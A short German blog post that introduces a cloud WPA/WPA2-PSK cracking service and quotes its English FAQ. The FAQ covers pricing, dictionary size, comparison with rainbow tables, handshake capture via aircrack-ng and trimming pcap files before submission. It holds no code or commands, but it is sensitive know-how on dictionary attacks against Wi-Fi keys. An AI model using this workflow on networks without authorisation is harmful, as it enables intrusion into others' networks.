WPA Crack in the Cloud
Moxie Marlinspike hat eine genialen Geschäftszweig mit Cloud Computing erschlossen.
Er lässt eine große Cloud einfach den WPA Key ausrechnen. Dies erfolgt in nur ca. 20 Minuten und kostet zurzeit nur um die US$ 17.
HOMEPAGE
Auszug aus seinen FAQ
How much does all this cost?
We offer two different cracking modes at two different prices. You can run your job against half of our CPU cluster for $17 US, or you can run it against the entire cluster for $34 US. The half-mode will take at most 40 minutes to exhaust the entire 135 million word dictionary file (but hopefully we’d find your password before that), where as the full-mode will take at most 20 minutes. This compares to an average run time of 5 days on a contemporary desktop machine, much longer on a laptop.
What if you don’t find my password?
The job costs the same whether we find your password or not. You’re paying for either the recovery (which is most often the case), or the knowledge that if you were to build an exhaustive 135 million word dictionary file and run your handshake against it for five days, you’d find nothing.
Aren’t there rainbow tables now?
Yes, the Church Of Wifi has put a large rainbow table collection online. However, there are a few ways in which this collection has not met our needs. The first is that since each handshake is salted with the ESSID of the network, you have to build a unique set of rainbow tables for each network that you’d potentially like to audit. The Church Of Wifi has gone to heroic efforts to build tables for the 1000 most popular ESSIDs, but we find that this is often not enough. If someone has enabled WPA encryption on their wireless network, chances are that they’ve changed their ESSID to something that’s not very common as well.
Additionally, since they had to build so many sets, they had to limit the size of their dictionary in order to keep the resulting tables manageable. We feel that 1,000,000 words is really not large enough to do a comprehensive search, and that the way the dictionary was constructed discounts some of the specifics for WPA network password requirements. WPA Cracker provides a service that can crack the PSK of a network with any ESSID, using a dictionary that is several orders of magnitude larger.
Do you use the OpenWall dictionary?
While the OpenWall project has done an excellent job of pushing the envelope on password cracking, in our experience the OpenWall dictionaries were tailored more specifically for Unix logins than for WPA networks. Our dictionary was meticulously compiled with WPA cracking in mind, and includes word combinations, phrases, numbers, symbols, and elite speak. It has worked quite well for us, and now we’re hoping that it can be helpful for you.
What kind of payment do you accept?
We use Amazon Payments. All you need is a normal account with Amazon.com, and you can use it to pay us with a credit card.
How do I capture a WPA handshake
We recommend checking out the aircrack-ng tutorial.
What do I do if my pcap is greater than 10MB?
You’ll need to use Wireshark or something else to export only the handshake to a smaller file. Remember to leave at least one beacon for your target network in there, though, so that the handshake remains associated with the ESSID you’re targeting.
What kind of information do you collect from me?
All we need is a pcap file with a WPA handshake in it, the ESSID of the network, and an email address to send the results to.
How do I contact you people?
Send an email to moxie@thoughtcrime.org
But I use WPA2 so it’s cool right?
Actually, while WPA2 introduced CCMP mode as a replacement for the problematic TKIP, when run with authentication based on Pre-Shared Keys (PSK), it is still vulnerable to dictionary attacks. Our service works against both WPA and WPA2 when PSK is being used.